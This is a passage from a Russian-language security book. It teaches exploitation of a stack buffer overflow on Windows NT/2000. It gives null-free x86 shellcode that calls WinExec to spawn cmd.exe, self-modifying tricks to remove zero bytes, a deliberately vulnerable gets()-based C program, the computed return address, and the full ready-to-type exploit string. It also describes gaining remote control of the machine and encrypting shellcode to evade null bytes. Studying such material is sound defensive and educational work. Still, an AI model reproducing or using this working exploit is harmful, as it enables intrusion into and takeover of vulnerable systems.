· 00000005: 68?????? ?? push offset cmdLine;
· 0000000A: B8 01 86 E9 77 mov eax,077E98601;"
· 0000000F: FF D0 call eax
Всего шестнадцать байт без учета длины имени файла и кода, возвращающего управление основной ветке программы.
Некоторые пояснения: поскольку, функции API Windows вызываются по соглашению PASCAL, то аргументы заносятся в стек справа на лево, и выталкивает их из стека сама вызываемая функция. Первой передается константа WS_SHOW, равная пяти. Если передать любое другое ненулевое значение, функция все равно отработает успешно, но появится возможность избавится от трех нулей, присутствующих в двойном слове, младший байт которого равен пяти. Смещение строки, содержащей имя файла, так же содержит нуль в своем старшем байте, от которого необходимо избавится. Так же необходимо как-то освободится от завершающего строку нуля.
Если приведенный выше код расположить в локальном буфере функции и передать ему управление командой ret, он окажется неработоспособным. До выхода из функции пространство стека, занятое локальными переменными, освобождается: регистр указателя верхушки стека смещается вниз на дно кадра стека, а поскольку функция WinExec интенсивно использует стек, то, с вероятностью близкой к единице, код, вызывающий WinExec, окажется уничтожен и после возврата из функции произойдет исключение, приводящее к аварийному завершению программы. Во избежание этого необходимо «поднять» указатель верхушки стека, восстанавливая кадр стека. Для этого можно воспользоваться командой “SUB ESP,??”, которая в шестнадцатеричных кодах выглядит так: “83 EC??”, и не содержит нулей в старших байтах константы, поскольку ей отводится всего один знаковый байт, который может принимать значения от -0x7F до 0x7F. Если этого окажется недостаточно, можно использовать несколько команд “SUB ESP,??” или поискать какие-нибудь другие решения (которых просто море).
Избавится от нуля в смещении строки можно, например, следующим образом: запустить отладчик и установить точку останова на команде “ret”. Дождавшись всплытия отладчика, выбрать регистр, старшее слово которого совпадает со смещением строки. Если же такового не окажется, можно прибегнуть к следующему приему:
· 00000000: 33 C0 xor eax,eax
· 00000002: B0?? mov al,??;"f
· 00000004: C1 E0 10 shl eax,010;
· 00000007: 66 B8???? mov ax,????;
Не сложнее избавится и от нуля, завершающего строку. Достаточно прибегнуть, например, к самомодифицирующемуся коду, который может выглядеть, например, следующим образом (регистр EAX должен указывать на начало строки):
· 00000000: FE4007 inc b,[eax][00007]
· 000000x0: 63 ‘c’
· 000000x1: 6D ‘m’
· 000000x2 64 ‘d’
· 000000x3: 2E ‘.’
· 000000x4: 65 ‘e’
· 000000x5 78 ‘x’
· 000000x6: 65 ‘e’
· 000000x7: FF ‘xFF’
Строку завершает байт 0xFF, который командой INC, превращается в ноль! Разумеется, допустимо использовать и другие математические операции, например, SUB или логические XOR, AND.
Объединив все вышесказанное, можно получить код, который может выглядеть, например, так:
· 00000000: 83 EC?? sub esp,??;
· 00000003: 33 C0 xor eax,eax
· 00000005: B0?? mov al,??;
· 00000007: 50 push eax;
· 00000008: C1 E0 10 shl eax,010;
· 0000000B: 66 B8???? mov ax,????;
· 0000000F: FE 40 07 inc b,[eax][00007];
· 00000012: 50 push eax;
· 00000013: B8 01 86 E9 77 mov eax,077E98601;"
· 00000018: FF D0 call eax;
· 0000001A: EB FE jmps 00000001A;
· 0000001C: 63 ‘c’;
· 0000001D: 6D ‘m’;
· 0000001E: 64 ‘d’;
· 0000001F: 2E ‘.’;
· 00000020: 65 ‘e’;
· 00000021: 78 ‘x’;
· 00000022: 65 ‘e’;
· 00000023: FF ‘xFF’;
Вместо возращения управления основой ветке программы, в коде, приведенном выше, использовано зацикливание. Это не самое лучшее решение, однако, чаще всего оно никак не отражается на работоспособности атакуемой программы, (т.е. не вешает ее), поскольку каждый подключившийся к серверу пользователь обычно обрабатывается отдельным потоком. Однако, возможно значительное падение производительности, особенно хорошо заметное на однопроцессорных машинах и правильнее было бы вгонять поток в сон, например, воспользовавшись вызовом WaitForSingleObject. Но в некоторых случаях можно обойтись и без этого [326].
Пусть, например, имеется следующая программа, содержащая ошибку переполнения буфера (на диске, прилагаемом к книге, она находится в файле “/SRC/buff.cmd.c”):
· #include «stdio.h»
· #include «string.h»
·
·
· auth()
· {
· char pass[32];
· printf("Passw:"); gets( amp;pass[0]);
· if (!strcmp( amp;pass[0],"KPNC*"))
· return 1;
· return 0;
·}
·
· main()
· {
· printf("CMD Shell Demon");
· if (auth())
· printf("Password okn");
· else
· printf("Invalid passwordn");
·
·}
Если откомпилировать этот файл с помощью Microsoft Visual Studio 6.0 и запустить под отладчиком, установив точку останова в начале процедуры auth(), можно узнать адрес буфера в стеке, размер кадра стека и значение регистров при выходе из функции (разумеется, для этого необходимо трассировать код, пока не встретится команда ret). Отладчик в этот момент может выглядеть так (смотри рисунок 076):
Рисунок 076 Выяснение адреса буфера
Значение регистра ESP в момент выхода из функции равно 0x12FF7C [327], а размер кадра стека 0x20+0x4 = 0x24 байт (четыре байта занимает сохраненное в стеке значение регистра EBP). Следовательно, адрес буфера (а он находится на вершине стека) равен 0x12FF7C - 0x24 = 0x12FF58. Задав этот адрес в окне дампа памяти можно удостовериться, что сюда действительно помещается введенная пользователем строка.
Значение регистра EDX после выхода из функции strcmp совпадает со смещением начала буфера. Поэтому, код для запуска командного интерпретатора путем вызова WinExec может выглядеть так:
· 00000000: 83 EC 30 sub esp,030;
· 00000003: 52 push edx;
· 00000004: B2 6B mov dl,06B;
· 00000006: FE 42 07 inc b,[edx][00007];
· 00000009: 52 push edx;
· 0000000A: B8 01 86 E9 77 mov eax,077E98601;
· 0000000F: FF D0 call eax;
· 00000011: EB FE jmps 000000011;
· 00000013: 63 ‘c’
· 00000014: 6D ‘m’
· 00000015 64 ‘d’
· 00000016: 2E ‘.’
· 00000017: 65 ‘e’
· 00000018 78 ‘x’
· 00000019: 65 ‘e’
· 0000001A: FF ‘xFF’
Смещение строки “cmd.exe” в буфере равно 0x13, следовательно, младший байт регистра EDX должен быть равен 0x58+0x13 = 0x6B. Остается вычислить адрес возврата, задаваемый 37, 38 и 39 байтами вводимой строки (размер буфера 32 байта и еще 4 байта занимает сохраненное значение регистра EBP). Он равен (с учетом обратного порядка байтов) 0x88 0xFF 0x12.
Тогда, вся строка в десятичном представлении (приготовленная для ввода через Alt) будет выглядеть так (на диске, прилагаемом к книге, она находится в файле “/SRC/buff.cmd.2000.key”, однако, перенаправление ввода блокирует клавиатуру и в командном интерпретаторе, поэтому все же придется набирать эту строку вручную):
· 131 236 048 082 178 107 254 066 007 082 184 001 134
· 233 119 255 208 235 254 099 109 100 046 101 120 101
· 255 088 088 088 120 088 088 120 120 088 088 255 018
Если ввести его правильно и без ошибок, запустится командный интерпретатор, что и демонстрирует рисунок 077.
Рисунок 077 Демонстрация запуска командного интерпретатора
Поскольку Windows 2000 поставляется вместе с telnet-сервером, злоумышленник получает возможность запустить cmd.exe на удаленной машине и управлять ею по своему усмотрению. Штатная поставка Windows NT 4.0 не содержит средств для поддержки такого сервиса, однако, злоумышленник может передать необходимые инструкции в командной строке, например, так: “cmd.exe /k copy xxxx yyyyy”, для копирования выбранного файла в доступную ему директорию.
Точно так можно запустить и любой другой файл, не только командный интерпретатор. Однако, описанный метод запуска программ, привязан к конкретной версии операционной системы и код, написанный для одной из них, окажется неработоспособен в другой. В UNIX системах, совместимых с System V адреса системных вызовов стандартизированы и не меняются от версии к версии.
Дополнение. Шифровка кода
В дополнении «Использование срыва стека для запуска командного интерпретатора под Windows NT» к главе «Технология срыва стека» были рассмотрены некоторые способы избавления от нулей, встречающихся в исполняемом коде. Грубо их можно разделить на следующие категории:
· Использование математических и логических операций для вычисления требуемого результата на лету. (Например: XOR EAX,EAX; AND EAX,0xFF??FFFF; INC [EAX])
· Использование SEX [328]-мнемоник, (Например, вместо 05 20 00 00 00 add eax,0x20 можно использовать 83 C0 20 add eax,+0x20)
· Использование регистров (ячеек памяти) уже содержащих требуемое значение
Однако SEX-мнемоники выручают не во всех случаях, использование «мусора», оставленного вызывающий код функцией, ненадежно и не позволяет создать мобильный код [329], а использование математических операций для избавления от каждого нуля при большом количестве нулей потребует много памяти, которой может не хватить.
Поэтому, часто оказывается выгоднее шифровать весь код целиком, поскольку простейший декодер занимает порядка шестнадцати байт, а каждая операция избавления от нулевой ячейки требует по крайней мере три байта (FE 42?? INC b, [EDX+??]). Легко посчитать, если в передаваемом коде наличествуют более шести нулевых несмежных байт, использование декодера позволяет сэкономить память.
